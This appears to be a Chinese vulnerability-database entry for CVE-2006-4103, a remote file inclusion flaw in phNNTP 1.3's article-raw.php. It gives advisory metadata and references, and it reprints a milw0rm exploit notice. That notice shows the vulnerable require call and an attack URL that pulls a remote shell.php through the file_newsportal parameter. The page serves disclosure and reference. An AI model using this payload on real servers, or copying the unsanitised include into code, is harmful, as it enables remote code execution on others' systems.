Jason Alexander phNNTP 'article-raw.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110777 漏洞类型 输入验证
发布时间 2006-08-08 更新时间 2006-08-15
CVE编号 CVE-2006-4103 CNNVD-ID CNNVD-200608-205
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2148
https://cxsecurity.com/issue/WLB-2006080082
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-205
|漏洞详情
JasonAlexanderphNNTP1.3及早期版本的article-raw.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助file_newsportal参数中的URL执行任意PHP代码。
|漏洞EXP
phNNTP v1.3 Remote File Inclusion

CreW: ToxiC

Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz

Problem Is:
require("$file_newsportal");

Page Affect:
article-raw.php

Path:
Declare file_newsportal

ExP:
http://server/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?

Greatz: Str0ke

# milw0rm.com [2006-08-08]
|参考资料

来源:XF
名称:phnntp-article-file-include(28271)
链接:http://xforce.iss.net/xforce/xfdb/28271
来源:BID
名称:19423
链接:http://www.securityfocus.com/bid/19423
来源:BUGTRAQ
名称:20060808phNNTP<=1.3(article-raw.php)RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/442582/100/0/threaded
来源:MILW0RM
名称:2148
链接:http://www.milw0rm.com/exploits/2148
来源:VUPEN
名称:ADV-2006-3223
链接:http://www.frsirt.com/english/advisories/2006/3223
来源:SECUNIA
名称:21407
链接:http://secunia.com/advisories/21407
来源:SECTRACK
名称:1016668
链接:http://securitytracker.com/id?1016668
来源:SREASON
名称:1373
链接:http://securityreason.com/securityalert/1373
来源:MILW0RM
名称:2148
链接:http://milw0rm.com/exploits/2148